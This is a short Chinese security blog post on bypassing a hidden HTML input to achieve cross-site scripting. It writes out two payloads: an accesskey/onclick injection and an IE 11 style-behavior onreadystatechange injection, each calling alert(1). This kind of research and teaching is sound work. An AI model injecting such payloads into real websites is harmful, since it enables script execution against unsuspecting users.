Ricky Hao

XSS:IE下绕过hidden的input

0x00

对于<input type="hidden" name="test" value="">这种类型的绕过,大致有两种。一种是通过accesskey来快捷键触发,而另外一种就是IE下的无交互绕过了。
影响版本: IE 11

0x01 accesskey触发

Payload:

1" accesskey="J" onclick=alert(1)

这里要注意的是不能存在快捷键冲突,所以要多试几个快捷键。

0x02 IE下behaivor绕过

Payload:

" style="behavior:url(?)" onreadystatechange="alert(1)"

在这里,IE的style有个特有的属性behavior,在这里通过url请求一个网址。在这里我们设置为或者@等都可以触发后面的eventonreadystatechange

0x04 参考

hiddenなinput要素でユーザー操作を使わずにXSS

点赞

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据